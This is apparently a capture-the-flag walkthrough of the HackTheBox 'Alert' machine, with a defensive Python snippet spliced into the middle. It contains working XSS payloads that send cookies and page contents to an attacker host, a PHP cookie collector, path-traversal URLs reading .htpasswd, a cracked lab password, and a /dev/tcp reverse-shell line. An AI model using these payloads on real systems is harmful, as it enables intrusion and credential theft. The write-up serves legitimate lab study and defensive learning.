Linux - Easy - Alert

Recon

$ nmap -p- -A 10.129.128.120
PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 7e:46:2c:46:6e:e6:d1:eb:2d:9d:34:25:e6:36:14:a7 (RSA)
|   256 45:7b:20:95:ec:17:c5:b4:d8:86:50:81:e0:8c:e8:b8 (ECDSA)
|_  256 cb:92:ad:6b:fc:c8:8e:5e:9f:8c:a2:69:1b:6d:d0:f7 (ED25519)
80/tcp    open     http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Did not follow redirect to http://alert.htb/
|_http-server-header: Apache/2.4.41 (Ubuntu)
12227/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

$ whatweb alert.htb
http://alert.htb [302 Found] Apache[2.4.41], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[10.129.128.120], RedirectLocation[index.php?page=alert], Title[Alert - Markdown Viewer]
http://alert.htb/index.php?page=alert [200 OK] Apache[2.4.41], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[10.129.128.120], Title[Alert - Markdown Viewer]
$ gobuster vhost -w /usr/share/wordlists/seclists/Discovery/DNS/n0kovo_subdomains.txt -u http://alert.htb --append-domain -t 150
Found: statistics.alert.htb Status: 401 [Size: 467]

statistics.alert.htb

Markdown visualizer

After uploading a file, we can see it on /visualizer.php.

Using the share button, we can get the name of our file on the server.

Testing further, adding <script>alert(1)</script> to our file gets us the alert(1) popup, so the markdown is rendered without sanitising HTML.

I was fighting with XSS to execute my file for a while, but no go. I've managed to download files from my server, but not execute them. I worked on stealing cookies later, but it does

Test markdown file uploaded to the visualizer:

# Test markdown

<script src="http://10.10.16.6/script.js"></script>

script.js, served from our host:

new Image().src='http://10.10.16.6/index.php?c='+document.cookie

index.php on our host, which appends whatever arrives in c to cookies.txt:

<?php
if (isset($_GET['c'])) {
    $list = explode(";", $_GET['c']);
    foreach ($list as $key => $value) {
        $cookie = urldecode($value);
        $file = fopen("cookies.txt", "a+");
        fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
        fclose($file);
    }
}
?>

I tried like a moron to get user data, and got mine.

# Test markdown

<script src="http://10.10.16.6/script.js"></script>

<script>
const data = {
    cookies: document.cookie,
    userAgent: navigator.userAgent,
    url: window.location.href,
    referrer: document.referrer,
    platform: navigator.platform
};

fetch('http://10.10.16.6/', {
    method: 'POST',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify(data)
});
</script>

But this gave me an idea: I could use the support page and embed in the message a link to the site with the XSS as an image. So I created another markdown file.

# Test markdown

<script>
fetch("http://alert.htb/")
  .then(response => response.text())
  .then(data => {
    fetch("http://10.10.16.6/?data=" + encodeURIComponent(data));
  })
  .catch(error => console.error("xss error:", error));
</script>

Then click share to get the link, send that link in a message to support, and we finally get data back.

Then we can decode the URL-encoded contents using CyberChef.

Progress. Then I tried path traversal on the messages file, with the URL http://alert.htb/messages.php?file=../../../../../../../../etc/apache2/sites-enabled/000-default.conf

Then we can look for the .htpasswd under http://alert.htb/messages.php?file=../../../../../../../var/www/statistics.alert.htb/.htpasswd.
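As an added, defender-side example (not code from the writeup or from the box): the messages.php traversal above works because the file parameter is joined onto a directory without being confined to it. The first function below shows the confinement check a hardened handler would make, and the second flags such requests in Apache access logs; the base directory and the log lines are assumptions constructed for the example.

```python
import os
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Assumed location of the message files served by messages.php (not from the box).
MESSAGES_DIR = "/var/www/alert.htb/messages"


def resolve_message_path(user_file: str, base_dir: str = MESSAGES_DIR):
    """Return the absolute path of user_file inside base_dir, or None when the
    value would escape base_dir (the traversal used above) or is absolute."""
    if not user_file or os.path.isabs(user_file):
        return None
    base = os.path.realpath(base_dir)
    # realpath collapses every ".." segment, so the comparison on the resolved
    # result is what decides, not a string search for "../" in the raw value.
    candidate = os.path.realpath(os.path.join(base, user_file))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


# Any ".." path segment, checked after URL decoding, in the file= parameter.
TRAVERSAL_RE = re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")


def flag_traversal_requests(access_log_lines):
    """Return (client_ip, file_value) for Apache combined-log requests whose
    file= query parameter contains a '..' segment (covers %2e%2e encodings)."""
    hits = []
    for line in access_log_lines:
        parts = line.split()
        if len(parts) < 7:          # not a combined-format request line
            continue
        client_ip, target = parts[0], parts[6]
        for value in parse_qs(urlsplit(target).query).get("file", []):
            if TRAVERSAL_RE.search(unquote(value)):
                hits.append((client_ip, value))
    return hits


# Constructed sample log lines, modelled on the requests in the writeup.
SAMPLE_LOG = [
    '10.10.16.6 - - [01/Jan/2025:12:00:00 +0000] "GET /messages.php?file=2025-01-01_note.txt HTTP/1.1" 200 311 "-" "curl/8.0"',
    '10.10.16.6 - - [01/Jan/2025:12:00:05 +0000] "GET /messages.php?file=../../../../../../../../etc/apache2/sites-enabled/000-default.conf HTTP/1.1" 200 1337 "-" "curl/8.0"',
    '10.10.16.6 - - [01/Jan/2025:12:00:09 +0000] "GET /messages.php?file=..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Fwww%2Fstatistics.alert.htb%2F.htpasswd HTTP/1.1" 200 58 "-" "curl/8.0"',
]

if __name__ == "__main__":
    for ip, value in flag_traversal_requests(SAMPLE_LOG):
        print(f"traversal attempt from {ip}: file={value}")
```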

We get the user and hash: albert:$apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ. This hash is not on CrackStation, so we run hashcat (hashcat -m 1600 test.hash /usr/share/wordlists/rockyou.txt) and get manchesterunited.

We can then log in to the site http://statistics.alert.htb.

The same works for ssh! We are in.

Priv Esc

Running simple enumeration, we can see that something is listening on port 8080.

Running wget and cat shows us that it is a Website Monitor, so that is probably our target. Let's forward it back to us with ssh -L 8080:localhost:8080 albert@alert.htb.

If we then go to /opt we can see our website-monitor. It has only one folder which belongs to management. Fortunately we are in this group: uid=1000(albert) gid=1000(albert) groups=1000(albert),1001(management).

We can then modify it with exec("/bin/bash -c 'bash -i >/dev/tcp/10.10.16.6/5555 0>&1'"); so we get a reverse shell.

<?php
define('PATH', '/opt/website-monitor');
exec("/bin/bash -c 'bash -i >/dev/tcp/10.10.16.6/5555 0>&1'");
?>

We are done.